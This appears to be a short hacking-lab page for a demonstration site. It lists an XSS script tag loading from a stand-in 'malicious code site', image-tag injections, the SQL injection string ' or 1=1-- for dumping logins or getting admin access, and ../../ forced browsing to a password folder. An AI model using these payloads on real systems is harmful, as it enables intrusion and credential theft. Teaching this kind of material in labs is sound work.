1) <script src="http://yourMaliciousCodeSite.com"></script>
2) <img src="http://some site you want to grab from">
3) <img src="http://a vulnerable site you want another user to inject to">
There are three ways to access this site:
1) SQL Injection - ' or 1=1--
With the right query string, SQL injection should let you dump the user:pass combo from the server or log in as admin.
2) Forced Browsing - ../../
The use of forced browsing is very common against servers that have not been secured properly. Sometimes you can find a text file containing information, or even access htdocs on a Linux box. This site was set up for demonstration purposes. The file is located in the folder named "pass".
3) Examine the code to see if you see any hints
Developers often leave pertinent information inside the code because they are rushed and forget to remove comments. They may also have hard-coded information that can be useful for an attack. Always examine the code to look for clues.